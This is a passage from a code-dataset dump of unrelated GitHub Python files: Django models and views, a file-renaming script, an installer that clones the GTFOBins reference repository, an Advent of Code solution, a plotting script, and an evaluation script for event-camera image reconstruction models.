workInfoObj.save()\n\n recipe.save()\n\n ## show message in base.html\n messages.success(ip_p['request'], 'ดำเนินการสำเร็จ!!') \n if ip_p['request'].user.is_staff: \n redirect_dest = redirect('data:list_teacher')\n else:\n redirect_dest = redirect('home') \n is_save = True \n else:\n messages.error(ip_p['request'], 'โปรดแก้ข้อผิดพลาดด้านล่างก่อน')\n form = fixDateinPostForm(ip_p['path'], form,toAC=False)\n\n is_save = False\n redirect_dest = None\n return is_save, redirect_dest\n\n\n\ndef prepareToFront(ip_p, form, dict_send, modelObj=None):\n\n # set form data and send to front-end\n # import pdb; pdb.set_trace()\n # form = fixDateinForm(ip_p, form,toAC=False)\n dict_send['form'] = form\n\n ## change datetime when open the page for edit Y-m-d --> d/m/Y (just for good looking) \n if ip_p['path'] == \"personal_info\" : \n dict_send['path_picture'] = \"/media/\" + str(modelObj.image) \n \n \n # date_value = form['birth_date'].value() \n # if date_value != None :\n # form['birth_date'].initial = AD_date_to_BD_str(date_value)\n \n # elif path == \"work_info\" :\n # start_service_date = form['start_service_date'].value() \n # if start_service_date != None :\n # form['start_service_date'].initial = AD_date_to_BD_str(start_service_date)\n \n # end_service_date = form['end_service_date'].value() \n # if end_service_date != None :\n # form['end_service_date'].initial = AD_date_to_BD_str(end_service_date)\n \n # start_PW_date = form['start_PW_date'].value() \n # if start_PW_date != None :\n # form['start_PW_date'].initial = AD_date_to_BD_str(start_PW_date)\n \n ### for given name\n dict_send['form_tuple'] = [] \n for i,field in enumerate(form):\n if len(dict_send['name_list']) > 0 :\n dict_send['form_tuple'].append( (dict_send['name_list'][i] , field) )\n\n return dict_send\n","repo_name":"peachman05/Pwcrew","sub_path":"data/viewHelper.py","file_name":"viewHelper.py","file_ext":"py","file_size_in_byte":7019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30595695704","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDescription: Script allow you to rename data in input folder:\n\nAuthors: Evgenii Churiulin\n\nCurrent Code Owner: MPI-BGC, Evgenii Churiulin\nphone: +49 170 261-5104\nemail: evgenychur@bgc-jena.mpg.de\n\nHistory:\nVersion Date Name\n---------- ---------- ----\n 1.1 06.03.2023 Evgenii Churiulin, MPI-BGC\n Initial release\n 1.2 07.06.2023 Evgenii Churiulin, MPI-BGC\n Code refactoring\n\"\"\"\n# ============================= Import modules =================\n# -- Standard:\nimport os\nimport pandas as pd\n# ============================= Personal functions ===================\n\n# ================ User settings (have to be adapted) =================\nmain = 'C:/Users/evchur/Desktop/Ergebnisse/MH-r/Test/'\n# -- Input and Output paths:\npin = main\npout = main\n# -- New common name for input data:\nname = 'highTOC_Gerighausen_'\n# -- Data format:\nexc_format = '.xls'\n# ============================= Main program =========================\nif __name__ == '__main__':\n # -- Get the list of input data in main folder (we are interesting only in '.xls' files )\n lst4names = []\n for path in os.listdir(main):\n if path.endswith(exc_format):\n lst4names.append(path)\n # -- Get absolute data paths:\n lst4paths = []\n for file in lst4names:\n lst4paths.append(os.path.join(main, file))\n # -- Get the list out new files based on input data:\n lst4out = []\n for file in lst4paths:\n df = pd.read_excel(file)\n num = df['Unnamed: 1'][0]\n new_name = f'{name}EL{num}{exc_format}'\n lst4out.append(os.path.join(main, new_name))\n # -- Rename and save files:\n for i in range(len(lst4out)):\n print(f'File \\n {lst4paths[i]} was rename to \\n {lst4out[i]}')\n print(' ')\n os.rename(lst4paths[i], lst4out[i])\n# ============================= End of program ======================\n","repo_name":"EvgenyChur/TIC_TOC_postprocessing","sub_path":"scripts/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37500769780","text":"from django.db import models\nfrom django.conf import settings\nfrom django.db.models import Value, Func, F\nimport math\n\nfrom django.db.backends.signals import connection_created\nfrom django.dispatch import receiver\n\n\n@receiver(connection_created)\ndef extend_sqlite(connection=None, **kwargs):\n if connection.vendor == \"sqlite\":\n # sqlite doesn't natively support math functions, so add them\n cf = connection.connection.create_function\n cf('SQRT', 1, math.sqrt)\n cf('ATAN2', 2, math.atan2)\n cf('POW', 2, math.pow)\n cf('ACOS', 1, math.acos)\n cf('COS', 1, math.cos)\n cf('RADIANS', 1, math.radians)\n cf('SIN', 1, math.sin)\n\n\nclass BaseModel(models.Model):\n created_time = models.DateTimeField(auto_now_add=True)\n timestamp = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n\nclass Event(BaseModel):\n title = models.CharField(max_length=100, blank=False)\n description = models.TextField(blank=True)\n start_date = models.DateField()\n start_time = models.TimeField()\n end_date = models.DateField(blank=True, null=True)\n end_time = models.TimeField(blank=True, null=True)\n organizer = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n related_name=\"events_organized\",\n on_delete=models.CASCADE)\n location = models.ForeignKey(\n 'events.Location',\n related_name='events',\n on_delete=models.CASCADE)\n min_participants = models.PositiveIntegerField()\n max_participants = models.PositiveIntegerField()\n event_type = models.CharField(max_length=100)\n\n\nclass Participant(BaseModel):\n class Meta:\n unique_together = ((\"user\", \"event\"),)\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n related_name=\"events_participated\",\n on_delete=models.CASCADE)\n event = models.ForeignKey(\n 'events.Event',\n related_name='participants',\n on_delete=models.CASCADE)\n status = models.CharField(\n max_length=30,\n choices=(\n (\"INTERESTED\", \"Interested\"),\n (\"GOING\", \"Going\"),\n (\"NOTGOING\", \"Not going\"),\n (\"INVITED\", \"Invited\")),\n default=\"INTERESTED\")\n\n\nclass Friendship(BaseModel):\n status = models.CharField(\n max_length=20,\n choices=(\n (\"PENDING\", \"Pending\"),\n (\"FRIENDS\", \"Friends\"),\n (\"BLOCKED\", \"Blocked\"),\n ), default=\"FRIENDS\"\n )\n requested_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, blank=True)\n profiles = models.ManyToManyField('Profile', blank=True)\n\n\nclass Profile(BaseModel):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)\n location = models.ForeignKey(\n 'events.Location',\n related_name='profiles',\n on_delete=models.CASCADE)\n first_name = models.CharField(max_length=50, blank=False)\n last_name = models.CharField(max_length=50, blank=False)\n description = models.TextField(blank=True)\n email = models.CharField(max_length=100, blank=True)\n birth_date = models.DateField(blank=True, null=True)\n gender = models.CharField(\n max_length=20,\n choices=(\n (\"MALE\", \"Male\"),\n (\"FEMALE\", \"Female\"),\n (\"OTHER\", \"Other\"),\n (\"NOANSWER\", \"\")\n ),\n default=\"NOANSWER\")\n friends = models.ManyToManyField('Friendship', through=Friendship.profiles.through, blank=True)\n profile_picture = models.TextField(blank=True)\n\n\n @property\n def full_name(self):\n return \"{} {}\".format(self.first_name, self.last_name)\n\n\nclass LocationManager(models.Manager):\n def nearby(self, latitude, longitude, proximity):\n \"\"\"\n Return all object which distance to specified coordinates\n is less than proximity given in kilometers\n \"\"\"\n # Great circle distance formula\n\n earth_radius=Value(6371.0, output_field=models.FloatField())\n\n f1=Func(F('latitude'), function='RADIANS', output_field=models.FloatField())\n latitude2=Value(latitude, output_field=models.FloatField())\n f2=Func(latitude2, function='RADIANS', output_field=models.FloatField())\n\n l1=Func(F('longitude'), function='RADIANS', output_field=models.FloatField())\n longitude2=Value(longitude, output_field=models.FloatField())\n l2=Func(longitude2, function='RADIANS', output_field=models.FloatField())\n\n d_lat=Func(F('latitude'), function='RADIANS', output_field=models.FloatField()) - f2\n d_lng=Func(F('longitude'), function='RADIANS', output_field=models.FloatField()) - l2\n\n sin_lat = Func(d_lat/2, function='SIN', output_field=models.FloatField())\n cos_lat1 = Func(f1, function='COS', output_field=models.FloatField())\n cos_lat2 = Func(f2, function='COS', output_field=models.FloatField())\n sin_lng = Func(d_lng/2, function='SIN', output_field=models.FloatField())\n\n a = Func(sin_lat, 2, function='POW', output_field=models.FloatField()) + cos_lat1 * cos_lat2 * Func(sin_lng, 2, function='POW', output_field=models.FloatField())\n c = 2 * Func(Func(a, function='SQRT', output_field=models.FloatField()), Func(1 - a, function='SQRT', output_field=models.FloatField()), function='ATAN2', output_field=models.FloatField())\n d = earth_radius * c\n\n res = self.get_queryset()\\\n .exclude(latitude=None)\\\n .exclude(longitude=None)\\\n .annotate(d=d)\\\n .filter(d__lte=proximity)\\\n .order_by('distance')\n return res\n\n\n\nclass Location(BaseModel):\n objects = LocationManager()\n\n city = models.CharField(max_length=100, blank=False)\n country = models.CharField(max_length=100, blank=False)\n street = models.CharField(max_length=100, blank=True)\n google_id = models.CharField(max_length=50, blank=True)\n google_formatted_address = models.CharField(max_length=1000, blank=True)\n longitude = models.DecimalField(max_digits=9, decimal_places=6)\n latitude = models.DecimalField(max_digits=9, decimal_places=6)\n\n\nclass Tag(BaseModel):\n text = models.CharField(max_length=20, blank=False)\n events = models.ManyToManyField('events.Event', related_name='tags')\n\n\nclass Post(BaseModel):\n title = models.CharField(max_length=50)\n body = models.TextField(max_length=1000, blank=False)\n event = models.ForeignKey('events.Event', related_name='posts', on_delete=models.CASCADE)\n user = models.ForeignKey(settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)\n\n","repo_name":"j-tegen/gather-backend","sub_path":"project/events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42122267783","text":"from functools import lru_cache\nimport csv\n\n\n@lru_cache\ndef read(path):\n\n with open(path, mode=\"r\") as file:\n path_reader = csv.DictReader(file)\n\n list_content = list(path_reader)\n\n return list_content\n","repo_name":"William-Kassab/Job-Insights","sub_path":"src/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"6033219555","text":"def Install():\n print(\"[GTFOBins] Downloading db ...\")\n import os\n os.chdir(\"/var/lib/mkt/Res/Data/\")\n os.system(\"git clone https://github.com/GTFOBins/GTFOBins.github.io.git GTFOBins\")\n\ndef Uninstall():\n print(\"[GTFOBins] Removing db...\")\n import os\n os.system(\"rm -rf /var/lib/mkt/Res/Data/GTFOBins\")\n\ndef Upgrade():\n print(\"[GTFOBins] Checking and upgrading ...\")\n import os\n os.chdir(\"/var/lib/mkt/Res/Data/GTFOBins/\")\n Branches = \"master\"\n os.system(\"git pull origin %s || (git stash drop && git pull origin %s )\" % (Branches,Branches))","repo_name":"manesec/maketoolkit","sub_path":"Res/Source/GTFOBin.py","file_name":"GTFOBin.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"7267663193","text":"from enum import Enum\n\ntest=\"\"\"A Y\nB X\nC Z\"\"\"\n\nROCK=1\nPAPER=2\nSCISSORS=3\n\ncodeShapes={'A':ROCK,'B':2,'C':3,'X':ROCK,'Y':PAPER,'Z':SCISSORS}\nscoreShape={ROCK:1,PAPER:2,SCISSORS:3}\n\n\n\n\n\n\ndef weWon(they,we):\n\n rules={(ROCK,PAPER):True,\n (ROCK,SCISSORS):False,\n (PAPER,ROCK):False,\n (PAPER,SCISSORS): True,\n (SCISSORS, PAPER):False,\n (SCISSORS, ROCK): True}\n return rules[(they,we)]\n\n \ndef scoreRound(they,we):\n score=we # \"The score for a single round is the score for the shape you selected (1 for Rock, 2 for Paper, and 3 for Scissors)\"\n\n if they==we:\n score+= 3 # \"3 if the round was a draw\"\n elif weWon(they, we):\n score += 6 # \"and 6 if you won\"\n # else \"0 if you lost\"\n return score\n\n \n\n \n\n\nscoreTotal=0\nf = test.splitlines()\nf = open(\"day2.txt\")\nfor i in f:\n they,we = i.split()\n they=codeShapes[they]\n we=codeShapes[we]\n scoreTotal+= scoreRound(they,we)\n\nprint(scoreTotal)\n\n\n\n# part two\nLOSE = 1\nDRAW = 2 \nWIN = 3\ncodeResult = {'X':LOSE,'Y':DRAW,'Z':WIN}\n\ndesiredWe={(ROCK,LOSE):SCISSORS,\n (ROCK,DRAW):ROCK,\n (ROCK,WIN):PAPER,\n (PAPER,LOSE):ROCK,\n (PAPER,DRAW): PAPER,\n (PAPER,WIN): SCISSORS,\n (SCISSORS, LOSE):PAPER,\n (SCISSORS, DRAW): SCISSORS,\n (SCISSORS, WIN): ROCK}\nscoreTotal=0\nf = test.splitlines()\nf = open(\"day2.txt\")\nfor i in f:\n they,result = i.split()\n they=codeShapes[they]\n result = codeResult[result]\n we=desiredWe[(they,result)]\n scoreTotal+= scoreRound(they,we)\n\nprint(scoreTotal)","repo_name":"normanlorrain/2022_advent_of_code","sub_path":"day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30094171916","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 25 16:54:24 2019\n\n@author: c3216945\n\"\"\"\nimport numpy as np, pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator)\nimport matplotlib.ticker as ticker\nimport glob\nimport natsort\n\nf = glob.glob('*.csv')\nf = natsort.realsorted(f)\n\ndef readData(filename):\n d = pd.read_csv(filename, header=0,usecols=[1,2])\n d = np.asarray(d)\n return d\n\nd1 = readData(f[0])\nd2 = readData(f[1])\nd3 = readData(f[2])\n\nymax = 0.0825\nR = 0.165*0.5\n\nsortedyz1 = d1[d1[:,1].argsort()]\nsortedyz2 = d2[d2[:,1].argsort()]\nsortedyz3 = d3[d3[:,1].argsort()]\n\nz1 = sortedyz1[:,1]\nz2 = sortedyz2[:,1]\nz3 = sortedyz3[:,1]\n\ny1 = sortedyz1[:,0]\ny2 = sortedyz2[:,0]\ny3 = sortedyz3[:,0]\n\nz1shift = (z1 - z1[0])\nz2shift = (z2 - z2[0])\nz3shift = (z3 - z3[0])\n\nz1shiftP = (z1-z1[0])/R\nz2shiftP = (z2-z2[0])/R\nz3shiftP = (z3-z3[0])/R\n\ndiffy1 = np.diff(y1)\ndiffz1 = np.diff(z1shift)\nslope1 = diffy1/diffz1\n\ndiffy2 = np.diff(y2)\ndiffz2 = np.diff(z2shift)\nslope2 = diffy2/diffz2\n\ndiffy3 = np.diff(y3)\ndiffz3 = np.diff(z3shift)\nslope3 = diffy3/diffz3\n\nparams = {\n 'axes.labelsize': 11,\n 'font.family': 'Arial',\n 'legend.fontsize': 11,\n 'xtick.labelsize': 11,\n 'ytick.labelsize': 11,\n 'figure.figsize': [4.3, 1.5]\n# 'figure.dpi': 300 \n }\nplt.rcParams.update(params)\nfig,ax = plt.subplots()\nfig.subplots_adjust(left=0.12, bottom=.3 , right=0.97, top=0.96)\n\nax.plot(z1shiftP[1:], np.abs(slope1), lw=1,ls='-',label='$Ca_{TP}=0.0024, Re_{TP}=52$')\nax.plot(z2shiftP[1:], np.abs(slope2),lw=1,ls='--',label='$Ca_{TP}=0.0055, Re_{TP}=121$')\nax.plot(z3shiftP[1:], np.abs(slope3),lw=1,ls='-.',label='$Ca_{TP}=0.0163, Re_{TP}=355$')\n\n#ax.axhline(ymax,c='k',lw=1,ls='--')\n#ax.axhline(0,c='k',lw=1,ls='--')\n\n#---------------------------axis control------------------------#\n\nax.set_ylabel(\"|dy'/dz'|\")\nax.set_xlabel(\"$z'/L_B$\")\n#\nax.set_ylim(-0.1,2)\nax.set_xlim(0,1)\n\nmajorLocatorX = MultipleLocator(1)\nmajorLocatorY = MultipleLocator(0.5)\nminorLocatorX = MultipleLocator(0.2)\nminorLocatorY = MultipleLocator(0.1)\n##ax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%2.1f'))\n#\nax.xaxis.set_major_locator(majorLocatorX)\nax.xaxis.set_minor_locator(minorLocatorX)\nax.yaxis.set_minor_locator(minorLocatorY)\nax.yaxis.set_major_locator(majorLocatorY)\n#ax.xaxis.set_ticks(np.arange(0, 0.026, 0.005))\n#fig.text(0.15,0.82,'(a)',weight=\"bold\",fontsize=15)\n\n#------------------------legend control------------------------#\n#ax.legend(loc='center left', bbox_to_anchor=(1, 0.7))\n#ax.legend(loc=0,frameon=False,labelspacing=0.1)\n#ax.legend(loc='center left',frameon=False,bbox_to_anchor=(0.2, -0.25))\n#ax.legend(loc='center left', bbox_to_anchor=(1.01, 0.7),frameon=False,labelspacing=0.1)\n#fig.text(0.2,0.9,'(b)',weight=\"bold\",fontsize=15)\n\n#-----------------------add text------------------------------#\n\n#bbox_args = dict(boxstyle=\"round\", fc=\"0.8\")\n#arrow_args = dict(arrowstyle=\"->\")\n#ax.annotate('1', xy=(-0.9,0.8 ), xycoords='data', size=11,\n# xytext=(20, 20), textcoords='offset points',\n# ha=\"left\", va=\"bottom\",\n## bbox=bbox_args,\n# arrowprops=arrow_args)\n#\n#ax.annotate('2', xy=(-0.92,0.5), xycoords='data', size=11,\n# xytext=(30, 10), textcoords='offset points',\n# ha=\"left\", va=\"bottom\",\n## bbox=bbox_args,\n# arrowprops=arrow_args)\n##\n#ax.annotate('3', xy=(-0.95, 0.3), xycoords='data', size=11,\n# xytext=(30, 5), textcoords='offset points',\n# ha=\"left\", va=\"bottom\",\n## bbox=bbox_args,\n# arrowprops=arrow_args)\n#\n##\n#ax.annotate('$U_{TP}$', xy=(-0.4,1), xycoords='data', size=11,\n# xytext=(-30, 0), textcoords='offset points',\n# ha=\"center\", va=\"center\",\n## bbox=bbox_args,\n# arrowprops=arrow_args)\n\n#----------------------output figure-------------------------#\n#plt.margins(0)\n#fig.tight_layout(pad=0)\n#ax.grid(color=\"0.95\", linestyle='-', linewidth=1)\nfig.savefig('slope.tiff', dpi = 300)\nplt.show()","repo_name":"linhanGE/myPythonCode","sub_path":"plotSlope.py","file_name":"plotSlope.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"57"} +{"seq_id":"2694079404","text":"import torch\nimport os\nimport json\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nfrom dataset_utils import dataset_generator_from_bag\n\nfrom torchmetrics import (\n MeanSquaredError as MSE,\n StructuralSimilarityIndexMeasure as SSIM,\n)\nfrom torchmetrics.image.lpip import LearnedPerceptualImagePatchSimilarity as LPIPS\nfrom tqdm import tqdm\n\nfrom dataset_utils import get_dataset\nfrom models import get_model\n\n\ndef eval_model(\n model: torch.nn.Module,\n dataloader: torch.utils.data.DataLoader,\n output_folder: str,\n disable_progress=False,\n):\n\n # Predict and save images\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n mse = MSE()\n ssim = SSIM(data_range=1)\n lpips = LPIPS(net_type=\"vgg\", normalize=True)\n\n i = 0\n for batch in tqdm(dataloader, disable=disable_progress):\n events, imgs = batch\n\n # Compute results\n model.eval()\n with torch.no_grad():\n out = model.predict_images(batch)\n\n # Compute metrics\n imgs = imgs.permute(0, 3, 1, 2)\n greyscale_imgs = imgs.shape[1] == 1\n mse(out, imgs)\n ssim(out, imgs)\n if greyscale_imgs: # greyscale images\n out_rgb = torch.repeat_interleave(out, 3, 1)\n imgs_rgb = torch.repeat_interleave(imgs, 3, 1)\n lpips(out_rgb, imgs_rgb)\n else:\n lpips(out, imgs)\n\n # Save images and ground truths\n for j in range(len(out)):\n pred_img = out[j].permute(1, 2, 0).squeeze().detach().cpu().numpy()\n gt_img = imgs[j].permute(1, 2, 0).squeeze().detach().cpu().numpy()\n cmap = \"gray\" if greyscale_imgs else None\n filename = f\"{i:04}_pred.png\"\n plt.imsave(os.path.join(output_folder, filename), pred_img, cmap=cmap)\n filename = f\"{i:04}_gt.png\"\n plt.imsave(os.path.join(output_folder, filename), gt_img, cmap=cmap)\n i += 1\n\n # Save metrics\n metrics = {\n \"MSE\": mse.compute().item(),\n \"SSIM\": ssim.compute().item(),\n \"LPIPS\": lpips.compute().item(),\n }\n with open(os.path.join(output_folder, \"metrics.json\"), \"w\", encoding=\"utf8\") as fp:\n json.dump(metrics, fp)\n\n\ndef eval_VisionTransformerConv(\n results_path, checkpoint_path, dataloader, reconstruct_colors=False\n):\n from models.transformer import VisionTransformerConv, predict_color_images\n\n model = VisionTransformerConv.load_from_checkpoint(\n checkpoint_path,\n feature_loss_weight=None,\n image_loss_weight=None,\n map_location=\"cuda\",\n )\n\n path_split = checkpoint_path.split(os.sep)\n RUN_NAME = path_split[path_split.index(\"checkpoints\") - 1]\n suffix = \" - \" + (\"last\" if \"last.ckpt\" in checkpoint_path else \"best\")\n\n if reconstruct_colors:\n from types import MethodType\n\n model.predict_images = MethodType(predict_color_images, model)\n suffix = \" color \" + suffix\n\n output_folder = os.path.join(results_path, RUN_NAME + suffix)\n eval_model(model, dataloader, output_folder)\n\n\ndef eval_StudentK(results_path, checkpoint_path, dataloader):\n from models.teacher_student import StudentK\n\n teacher = get_model(\n {\n \"class_name\": \"Teacher\",\n \"teacher_path\": \"teacher-epoch=287-step=18144.ckpt\",\n \"MODEL_PARAMS\": {\"lr\": None},\n }\n )\n model = StudentK.load_from_checkpoint(\n checkpoint_path, teacher=teacher, map_location=\"cuda\"\n )\n\n path_split = checkpoint_path.split(os.sep)\n RUN_NAME = path_split[path_split.index(\"checkpoints\") - 1]\n\n output_folder = os.path.join(results_path, RUN_NAME)\n eval_model(model, dataloader, output_folder)\n\n\ndef prepare_dataset(\n base_dataset_path,\n dataset_name=\"DIV2K_5_FIX\",\n split=\"valid\",\n batch_size=16,\n crop_size=(128, 128),\n):\n dataset_params = {\n \"limit\": None,\n \"preload_to_RAM\": True,\n \"crop_size\": crop_size,\n \"events_normalization\": None,\n \"convert_to_bw\": False,\n }\n\n if \"BW\" in dataset_name.upper():\n dataset_params[\"convert_to_bw\"] = True\n\n dataloader_params = {\n \"batch_size\": batch_size,\n \"num_workers\": 0,\n \"pin_memory\": True,\n }\n\n dataset = get_dataset(\n base_dataset_path, dataset_name, dataset_params, splits=[split]\n )\n\n dataloader = torch.utils.data.DataLoader(\n dataset, shuffle=False, **dataloader_params\n )\n\n print(\"Loaded samples: {} \\t batches: {:<10}\".format(len(dataset), len(dataloader)))\n\n return dataset, dataloader\n\n\ndef eval_EventsVisualization(results_path, dataset, show_images=False):\n from media_utils import gen_visual_bayer_events\n\n i = 0\n for events, imgs in dataset:\n img = gen_visual_bayer_events(events)\n res_folder = os.path.join(results_path)\n if not os.path.exists(res_folder):\n os.mkdir(res_folder)\n out_path = os.path.join(res_folder, f\"{i:04}.png\")\n plt.imsave(out_path, img)\n if show_images:\n plt.imshow(img)\n plt.show()\n i += 1\n\n\ndef eval_CED(\n results_path,\n checkpoint_path,\n bag_paths,\n num_predictions,\n min_n_events,\n normalize_events=None,\n):\n from models.transformer import VisionTransformerConv\n from dataset import CustomDataset\n\n model = VisionTransformerConv.load_from_checkpoint(\n checkpoint_path,\n feature_loss_weight=None,\n image_loss_weight=None,\n map_location=\"cuda\",\n ).to(\"cuda\")\n\n print(\"Number of predictions: {}\".format(num_predictions))\n print(\"Minimum number of events: {}\".format(min_n_events))\n\n for bag_path in bag_paths:\n print(\"Processing bag:\", bag_path)\n\n test_gen = dataset_generator_from_bag(\n bag_path, n_temp_bins=10, min_n_events=min_n_events\n )\n\n dataset_name = os.path.basename(bag_path).replace(\".bag\", \"\")\n output_path = os.path.join(results_path, \"CED_Normalized\", dataset_name)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n i = 0\n for events, img in test_gen:\n if normalize_events:\n events = CustomDataset._normalize_events(None, events, normalize_events)\n events = torch.from_numpy(events).to(\"cuda\").unsqueeze(0)\n img = torch.from_numpy(img.astype(np.float32)).to(\"cuda\").unsqueeze(0)\n out = model.predict_images((events, img))[0]\n out = out.detach().squeeze().cpu().permute(1, 2, 0).numpy()\n img = img.detach().squeeze().cpu().numpy().astype(np.uint8)\n plt.imsave(os.path.join(output_path, f\"{i:04}_pred.png\"), out)\n plt.imsave(os.path.join(output_path, f\"{i:04}_gt.png\"), img)\n i += 1\n\n if i == num_predictions:\n break\n\n\ndef retrieve_best_images(folder):\n from torchmetrics.image.lpip import LearnedPerceptualImagePatchSimilarity\n\n lpips = LearnedPerceptualImagePatchSimilarity(net_type=\"vgg\", normalize=True)\n\n scores = {}\n\n pred_img = gt_img = None\n for image_file in sorted(os.listdir(folder)):\n image_path = os.path.join(folder, image_file)\n\n if \"_pred\" in image_path:\n pred_img = plt.imread(image_path)[:, :, :3].transpose(2, 0, 1)\n elif \"_gt\" in image_path:\n gt_img = plt.imread(image_path)[:, :, :3].transpose(2, 0, 1)\n\n if pred_img is not None and gt_img is not None:\n lpips(\n torch.from_numpy(pred_img[None, :]), torch.from_numpy(gt_img[None, :])\n )\n scores[image_file] = lpips.compute().item()\n lpips.reset()\n pred_img = gt_img = None\n\n return list(sorted(scores.items(), key=lambda x: x[1]))\n\n\nif __name__ == \"__main__\":\n results_path = r\"..\\06 - Results\"\n\n # === DIV2K ===\n\n base_dataset_path = r\"C:\\datasets\"\n\n valid_dataset, valid_dataloader = prepare_dataset(\n base_dataset_path,\n dataset_name=\"DIV2K_5_FIX_SMALL\",\n split=\"valid\",\n batch_size=16,\n )\n\n # Color VisionTransformerConv\n paths = [\n r\"E:\\Cartelle Personali\\Fabrizio\\Universita\\Magistrale\\Tesi\\Materiale da mostrare\\12-05\\lightning_logs\\Large - 1 il, 1e-2 fl, bn relu, maxpool, polarity fix\\checkpoints\\epoch=175-step=11088.ckpt\",\n r\"E:\\Cartelle Personali\\Fabrizio\\Universita\\Magistrale\\Tesi\\05 - Experiments\\lightning_logs\\Large - VisionTransformerConv final\\checkpoints\\epoch=499-last.ckpt\",\n ]\n for checkpoint_path in paths:\n eval_VisionTransformerConv(results_path, checkpoint_path, valid_dataloader)\n checkpoint_path = r\"E:\\Cartelle Personali\\Fabrizio\\Universita\\Magistrale\\Tesi\\05 - Experiments\\lightning_logs_00\\Large - ViTConv black and white\\checkpoints\\epoch=273-step=17262.ckpt\"\n\n # Color black and white VisionTransformerConv\n eval_VisionTransformerConv(\n results_path, checkpoint_path, valid_dataloader, reconstruct_colors=True\n )\n\n # StudentK\n checkpoint_path = r\"E:\\Cartelle Personali\\Fabrizio\\Universita\\Magistrale\\Tesi\\05 - Experiments\\lightning_logs\\Large - StudentK LeakyReLU PlateauLR\\checkpoints\\epoch=221-last.ckpt\"\n eval_StudentK(results_path, checkpoint_path, valid_dataloader)\n\n # Events visualization\n eval_EventsVisualization(os.path.join(results_path, \"DIV2KEvents\"), valid_dataset)\n\n # Black and white VisionTransformerConv\n # It's at the end of the eval because there is the need to load the bw dataset\n valid_dataset, valid_dataloader = prepare_dataset(\n +base_dataset_path,\n dataset_name=\"DIV2K_5_BW_FIX\",\n split=\"valid\",\n batch_size=16,\n )\n eval_VisionTransformerConv(results_path, checkpoint_path, valid_dataloader)\n\n # === CED ===\n # My Model on CED\n checkpoint_path = r\"E:\\Cartelle Personali\\Fabrizio\\Universita\\Magistrale\\Tesi\\05 - Experiments\\lightning_logs\\Large - VisionTransformerConv final\\checkpoints\\epoch=499-last.ckpt\"\n\n num_predictions = 5\n min_n_events = int(346 * 260 * 0.35)\n bag_paths = [\n \"C:\\datasets\\CEDDataset\\indoors_foosball_1.bag\",\n \"C:\\datasets\\CEDDataset\\indoors_very_dark_250ms.bag\",\n \"C:\\datasets\\CEDDataset\\people_static_dancing_multiple_3.bag\",\n \"C:\\datasets\\CEDDataset\\people_static_wave_counterclockwise.bag\",\n \"C:\\datasets\\CEDDataset\\simple_color_keyboard_2.bag\",\n \"C:\\datasets\\CEDDataset\\simple_jenga_destroy.bag\",\n \"C:\\datasets\\CEDDataset\\calib_low_density.bag\",\n \"C:\\datasets\\CEDDataset\\driving_country.bag\",\n \"C:\\datasets\\CEDDataset\\driving_tunnel_sun.bag\",\n ]\n eval_CED(\n results_path,\n checkpoint_path,\n bag_paths,\n num_predictions,\n min_n_events,\n normalize_events=\"z_score_non_zero\",\n )\n\n # E2VID on CED\n # Generate zip files from bags\n for rosbag_path in bag_paths:\n out_folder = \"rpg_e2vid/data\"\n os.system(\n f\"python rpg_e2vid/scripts/extract_events_from_rosbag.py {rosbag_path} --output_folder={out_folder} --event_topic=/dvs/events\"\n )\n\n # Generate images from zipfiles\n zip_paths = [\n \"rpg_e2vid\\data\\indoors_foosball_1.zip\",\n \"rpg_e2vid\\data\\indoors_very_dark_250ms.zip\",\n \"rpg_e2vid\\data\\people_static_dancing_multiple_3.zip\",\n \"rpg_e2vid\\data\\people_static_wave_counterclockwise.zip\",\n \"rpg_e2vid\\data\\simple_color_keyboard_2.zip\",\n \"rpg_e2vid\\data\\simple_jenga_destroy.zip\",\n \"rpg_e2vid\\data\\calib_low_density.zip\",\n \"rpg_e2vid\\data\\driving_country.zip\",\n \"rpg_e2vid\\data\\driving_tunnel_sun.zip\",\n ]\n weights_path = r\"rpg_e2vid\\pretrained\\E2VID_lightweight.pth.tar\"\n for dataset_path in zip_paths:\n dataset_name = os.path.basename(dataset_path).replace(\".zip\", \"\")\n output_path = os.path.join(results_path, \"E2VID\", dataset_name)\n\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n os.system(\n rf'python rpg_e2vid\\run_reconstruction.py -c {weights_path} -i \"{dataset_path}\" --output_folder=\"{output_path}\" --color'\n )\n\n # Events visualization\n for bag_path in bag_paths:\n bag_name = os.path.basename(bag_path).replace(\".bag\", \"\")\n output_path = os.path.join(results_path, \"CEDEvents\", bag_name)\n\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n valid_dataset = test_gen = dataset_generator_from_bag(\n bag_path, n_temp_bins=10, 